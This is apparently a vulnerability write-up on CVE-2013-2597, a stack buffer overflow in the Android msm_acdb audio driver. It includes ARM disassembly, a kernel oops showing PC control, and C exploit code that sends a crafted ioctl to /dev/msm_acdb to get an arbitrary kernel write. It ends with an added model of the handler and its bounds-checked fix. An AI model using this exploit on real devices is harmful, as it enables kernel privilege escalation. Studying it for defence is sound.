
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)

Time: 2022-03-10 17:49

do_vfs_ioctl:
    STMPW [SP], { R4-R9, LR }
    ...
    BL acdb_ioctl
    ...
    ADD SP, SP, #$44 // (2)
    LDMUW [SP], { R4-R9, PC } // (1)

2. A fragment of acdb_ioctl where control of PC can be obtained. The location that modifies the registers is (3); here every value from R4 through PC can be set.

ADD SP, SP, #$24 // (6)
LDMUW [SP], { R4-R9, PC }

5. The actual stack position and the position of p->data have to be hard-coded to match.

ACDB=> ACDB ioctl not found!
Unable to handle kernel paging request at virtual address 9f9e9d9c
pgd = df56c000
[9f9e9d9c] *pgd=00000000
Internal error: Oops: 80000005 [#1] PREEMPT SMP
Modules linked in:
CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1)
PC is at 0x9f9e9d9c
LR is at acdb_ioctl+0x740/0x860
/* Includes added for completeness; acdb_param and struct acdb_ioctl come from
 * the PoC's own header (not shown on this page), and ALOGI from Android's
 * liblog (<cutils/log.h> on older trees). */
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <cutils/log.h>

static int
write_value(const acdb_param *param, unsigned long address, unsigned long value)
{
    const char *device_name = "/dev/msm_acdb";
    struct acdb_ioctl arg;

    int fd;
    int ret;
    int i;

    fd = open(device_name, O_RDONLY);
    if (fd < 0) {
      ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));
      return -1;
    }

    /* size covers everything up to and including the second PC slot */
    arg.size = param->pc2.pos + 4;

    /* filler pattern: each word holds its own byte offset */
    for (i = 0; i < arg.size; i += 4) {
      *(unsigned long int *)&arg.data[i] = i;
    }

    *(unsigned long int *)&arg.data[param->address_pos] = address; // R9
    *(unsigned long int *)&arg.data[param->value_pos] = value; // R5
    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; // first PC slot
    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; // second PC slot

    ret = ioctl(fd, 9999, &arg); // any ioctl number will do: it triggers the stack overflow, and with it the arbitrary-address write
    close(fd);

    return 0;
}
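As an added example that is not from the original post or from the acdb driver source: a user-space model of the ioctl-handler pattern behind this bug, with the unchecked copy beside its bounds-checked form. The request layout (a size field followed by data[]) follows the PoC above; ACDB_BUF_WORDS, ACDB_MAX_USER and the function names are assumptions.

```c
/* Added example (not the page's or the driver's code): user-space model of the
 * acdb_ioctl handler pattern. Buffer sizes and names below are assumptions. */
#include <errno.h>
#include <stdint.h>
#include <string.h>

#define ACDB_BUF_WORDS 16   /* assumed size of the handler's stack buffer, in words */
#define ACDB_MAX_USER  256  /* assumed capacity of the user-supplied struct */

struct acdb_ioctl_model {
    uint32_t size;                 /* byte count chosen by the caller */
    uint8_t  data[ACDB_MAX_USER];  /* payload, also caller-controlled */
};

/* Vulnerable pattern: trusts arg->size and copies that many bytes into a
 * fixed stack buffer. With size > sizeof(buf) the copy runs over the saved
 * R4-R9/LR, which is why the oops above reports PC at a caller-chosen value.
 * Kept only for contrast; it is never called here with an oversized request. */
static int acdb_handler_unchecked(const struct acdb_ioctl_model *arg)
{
    uint32_t buf[ACDB_BUF_WORDS] = {0};
    memcpy(buf, arg->data, arg->size);   /* no bounds check */
    return (int)buf[0];
}

/* Hardened form: validate the caller's size against the destination before
 * copying, and fail the ioctl with -EINVAL otherwise. */
static int acdb_handler_checked(const struct acdb_ioctl_model *arg)
{
    uint32_t buf[ACDB_BUF_WORDS] = {0};
    if (arg->size > sizeof(buf))
        return -EINVAL;
    memcpy(buf, arg->data, arg->size);
    return (int)buf[0];
}

/* Builds a request of the given size whose first word is 0x41 (constructed
 * sample input) and dispatches it to the checked handler, or to the unchecked
 * one when checked == 0. Returns the handler's result. */
static int run_request(uint32_t size, int checked)
{
    struct acdb_ioctl_model arg;
    uint32_t first = 0x41;
    memset(&arg, 0, sizeof(arg));
    arg.size = size;
    memcpy(arg.data, &first, sizeof(first));
    return checked ? acdb_handler_checked(&arg) : acdb_handler_unchecked(&arg);
}
```

A request that fits the buffer behaves identically under both handlers; one word larger is accepted by the unchecked copy and rejected with -EINVAL by the checked one.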


Reference articles:





